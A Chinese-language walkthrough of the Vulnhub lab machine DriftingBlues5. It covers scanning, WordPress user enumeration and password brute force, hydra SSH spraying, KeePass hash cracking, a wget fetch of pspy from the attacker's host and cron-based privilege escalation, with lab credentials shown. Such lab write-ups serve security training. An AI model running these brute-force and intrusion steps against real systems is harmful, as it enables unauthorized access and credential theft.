靶机渗透实战-Vulnhub-Driftingblues5

主机发现

nmap 222.24.6.0/24

回显：

Nmap scan report for 222.24.6.173
Host is up (0.00084s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

详细端口扫描：

nmap -sV -A -p- -T4 222.24.6.173

回显：

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:31 CST
Nmap scan report for 222.24.6.173
Host is up (0.0041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

HTTP

看到网页架构为WordPress，尝试扫目录：

gobuster dir -u http://222.24.6.173/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -e

出现一些东西：

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://222.24.6.173/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://222.24.6.173/.html                (Status: 403) [Size: 277]
http://222.24.6.173/.php                 (Status: 403) [Size: 277]
http://222.24.6.173/index.php            (Status: 301) [Size: 0] [--> http://222.24.6.173/]
http://222.24.6.173/wp-content           (Status: 301) [Size: 317] [--> http://222.24.6.173/wp-content/]
http://222.24.6.173/license.txt          (Status: 200) [Size: 19915]
http://222.24.6.173/wp-includes          (Status: 301) [Size: 318] [--> http://222.24.6.173/wp-includes/]
http://222.24.6.173/wp-login.php         (Status: 200) [Size: 6625]
http://222.24.6.173/readme.html          (Status: 200) [Size: 7278]
http://222.24.6.173/wp-trackback.php     (Status: 200) [Size: 135]
http://222.24.6.173/wp-admin             (Status: 301) [Size: 315] [--> http://222.24.6.173/wp-admin/]
http://222.24.6.173/xmlrpc.php           (Status: 405) [Size: 42]
http://222.24.6.173/.php                 (Status: 403) [Size: 277]
http://222.24.6.173/.html                (Status: 403) [Size: 277]
http://222.24.6.173/wp-signup.php        (Status: 302) [Size: 0] [--> http://222.24.6.173/wp-login.php?action=register]
http://222.24.6.173/server-status        (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

访问wp-content目录，在/wp-content/uploads/2021/02下有个dblogo.png没有在页面上出现过。

WordPress

扫描：

wpscan --url http://222.24.6.173/

尝试扫用户名：

wpscan --url http://222.24.6.173/ -eu

发现回显：

[i] User(s) Identified:

[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://222.24.6.173/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

尝试爆用户名密码，先制作字典：

cewl -d 2 -m 4 -w passwd.txt --with-numbers http://222.24.6.173/index.php

将几个找到的用户名写入user.txt，开爆：

wpscan --url http://222.24.6.173/ -U user.txt -P passwd.txt

找到一个：

[+] Performing password attack on Wp Login against 5 user/s
[SUCCESS] - gill / interchangeable                                                                                                                                                                                  
Trying collins / pricey Time: 00:00:31 <==============================================================================================================                         > (6658 / 8077) 82.43%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable

尝试登录，但没有管理员权限。

SSH

SSH的密码在图片隐写里：

exiftool dblogo.png

查看：

ExifTool Version Number         : 12.76
File Name                       : dblogo.png
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2024:03:19 15:37:53+08:00
File Access Date/Time           : 2024:03:19 15:49:57+08:00
File Inode Change Date/Time     : 2024:03:19 15:49:57+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 300
Image Height                    : 300
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2021:02:24 02:55:28+03:00
Metadata Date                   : 2021:02:24 02:55:28+03:00
Modify Date                     : 2021:02:24 02:55:28+03:00
Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
Format                          : image/png
History Action                  : created, saved
History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size                      : 300x300
Megapixels                      : 0.090

不知道是哪个用户名的，尝试密码喷射：

hydra -L user.txt -p 59583hello ssh://222.24.6.173 -t 20

找到还是gill的：

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-19 15:53:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5/p:1), ~1 try per task
[DATA] attacking ssh://222.24.6.173:22/
[22][ssh] host: 222.24.6.173   login: gill   password: 59583hello
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-19 15:53:45

连接并拿到第一个flag：

ssh gill@222.24.6.173
cat user.txt

里面还有个keyfile.kdbx文件，是密码管理器KeePass创建的数据文件，先下载下来：

scp -rp gill@192.168.1.188:/home/gill/keyfile.kdbx .

爆破该数据文件的密码：

keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

找到一个密码：

Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)     
1g 0:00:00:04 DONE (2024-03-19 16:01) 0.2375g/s 1641p/s 1641c/s 1641C/s polly..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用KeePassXC打开，获取一些密码。

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde

提权

尝试查看计划任务：

cat /var/spool/cron/*

没权限，就上传工具pspy64查看。自己本机起个Apache，把pspy64丢到/var/www/html里，然后目标机下载：

wget http://222.24.6.149/pspy64

运行：

chmod 777 ./pspy64
./pspy64

得到回显：

pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/19 03:21:13 CMD: UID=1000  PID=1300   | ./pspy64 
2024/03/19 03:21:13 CMD: UID=0     PID=1294   | 
2024/03/19 03:21:13 CMD: UID=0     PID=1256   | 
2024/03/19 03:21:13 CMD: UID=1000  PID=1109   | -bash 
2024/03/19 03:21:13 CMD: UID=1000  PID=1108   | sshd: gill@pts/0     
2024/03/19 03:21:13 CMD: UID=1000  PID=1095   | (sd-pam) 
2024/03/19 03:21:13 CMD: UID=1000  PID=1094   | /lib/systemd/systemd --user 
2024/03/19 03:21:13 CMD: UID=0     PID=1091   | sshd: gill [priv]    
2024/03/19 03:21:13 CMD: UID=33    PID=1011   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=1006   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=1003   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=1002   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=1001   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=1000   | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=875    | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=873    | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=864    | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=33    PID=639    | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=106   PID=507    | /usr/sbin/mysqld 
2024/03/19 03:21:13 CMD: UID=0     PID=505    | /usr/sbin/apache2 -k start 
2024/03/19 03:21:13 CMD: UID=0     PID=431    | /usr/sbin/sshd -D 
2024/03/19 03:21:13 CMD: UID=0     PID=417    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/03/19 03:21:13 CMD: UID=0     PID=401    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 
2024/03/19 03:21:13 CMD: UID=0     PID=369    | /usr/sbin/cron -f 
2024/03/19 03:21:13 CMD: UID=0     PID=368    | /lib/systemd/systemd-logind 
2024/03/19 03:21:13 CMD: UID=104   PID=367    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2024/03/19 03:21:13 CMD: UID=0     PID=366    | /usr/sbin/rsyslogd -n -iNONE 
2024/03/19 03:21:13 CMD: UID=101   PID=359    | /lib/systemd/systemd-timesyncd 
2024/03/19 03:21:13 CMD: UID=0     PID=347    | 
2024/03/19 03:21:13 CMD: UID=0     PID=346    | 
2024/03/19 03:21:13 CMD: UID=0     PID=340    | 
2024/03/19 03:21:13 CMD: UID=0     PID=339    | 
2024/03/19 03:21:13 CMD: UID=0     PID=338    | 
2024/03/19 03:21:13 CMD: UID=0     PID=337    | 
2024/03/19 03:21:13 CMD: UID=0     PID=272    | 
2024/03/19 03:21:13 CMD: UID=0     PID=271    | 
2024/03/19 03:21:13 CMD: UID=0     PID=237    | /lib/systemd/systemd-udevd 
2024/03/19 03:21:13 CMD: UID=0     PID=218    | /lib/systemd/systemd-journald 
2024/03/19 03:21:13 CMD: UID=0     PID=187    | 
2024/03/19 03:21:13 CMD: UID=0     PID=186    | 
2024/03/19 03:21:13 CMD: UID=0     PID=184    | 
2024/03/19 03:21:13 CMD: UID=0     PID=154    | 
2024/03/19 03:21:13 CMD: UID=0     PID=112    | 
2024/03/19 03:21:13 CMD: UID=0     PID=110    | 
2024/03/19 03:21:13 CMD: UID=0     PID=108    | 
2024/03/19 03:21:13 CMD: UID=0     PID=106    | 
2024/03/19 03:21:13 CMD: UID=0     PID=105    | 
2024/03/19 03:21:13 CMD: UID=0     PID=103    | 
2024/03/19 03:21:13 CMD: UID=0     PID=102    | 
2024/03/19 03:21:13 CMD: UID=0     PID=100    | 
2024/03/19 03:21:13 CMD: UID=0     PID=95     | 
2024/03/19 03:21:13 CMD: UID=0     PID=59     | 
2024/03/19 03:21:13 CMD: UID=0     PID=50     | 
2024/03/19 03:21:13 CMD: UID=0     PID=49     | 
2024/03/19 03:21:13 CMD: UID=0     PID=48     | 
2024/03/19 03:21:13 CMD: UID=0     PID=30     | 
2024/03/19 03:21:13 CMD: UID=0     PID=29     | 
2024/03/19 03:21:13 CMD: UID=0     PID=28     | 
2024/03/19 03:21:13 CMD: UID=0     PID=27     | 
2024/03/19 03:21:13 CMD: UID=0     PID=26     | 
2024/03/19 03:21:13 CMD: UID=0     PID=25     | 
2024/03/19 03:21:13 CMD: UID=0     PID=24     | 
2024/03/19 03:21:13 CMD: UID=0     PID=23     | 
2024/03/19 03:21:13 CMD: UID=0     PID=22     | 
2024/03/19 03:21:13 CMD: UID=0     PID=21     | 
2024/03/19 03:21:13 CMD: UID=0     PID=20     | 
2024/03/19 03:21:13 CMD: UID=0     PID=19     | 
2024/03/19 03:21:13 CMD: UID=0     PID=18     | 
2024/03/19 03:21:13 CMD: UID=0     PID=17     | 
2024/03/19 03:21:13 CMD: UID=0     PID=16     | 
2024/03/19 03:21:13 CMD: UID=0     PID=15     | 
2024/03/19 03:21:13 CMD: UID=0     PID=14     | 
2024/03/19 03:21:13 CMD: UID=0     PID=12     | 
2024/03/19 03:21:13 CMD: UID=0     PID=11     | 
2024/03/19 03:21:13 CMD: UID=0     PID=10     | 
2024/03/19 03:21:13 CMD: UID=0     PID=9      | 
2024/03/19 03:21:13 CMD: UID=0     PID=8      | 
2024/03/19 03:21:13 CMD: UID=0     PID=6      | 
2024/03/19 03:21:13 CMD: UID=0     PID=4      | 
2024/03/19 03:21:13 CMD: UID=0     PID=3      | 
2024/03/19 03:21:13 CMD: UID=0     PID=2      | 
2024/03/19 03:21:13 CMD: UID=0     PID=1      | /sbin/init 
2024/03/19 03:21:52 CMD: UID=0     PID=1308   | 
2024/03/19 03:22:01 CMD: UID=0     PID=1309   | /usr/sbin/CRON -f 
2024/03/19 03:22:01 CMD: UID=0     PID=1310   | /usr/sbin/CRON -f 
2024/03/19 03:22:01 CMD: UID=0     PID=1311   | /bin/sh -c /root/key.sh 
2024/03/19 03:22:01 CMD: UID=0     PID=1312   | /bin/bash /root/key.sh 

发现最后每分钟执行一次/root/key.sh脚本，访问根目录猜测key.sh会访问/keyfolder。

在keyfolder下一个一个创建数据库中找到的密码，在新建fracturedocean文件后1分钟，出现文件rootcreds.txt：

touch fracturedocean
cat rootcreds.txt

得到密码：imjustdrifting31，上root即可拿到第二个flag：

cat /root/root.txt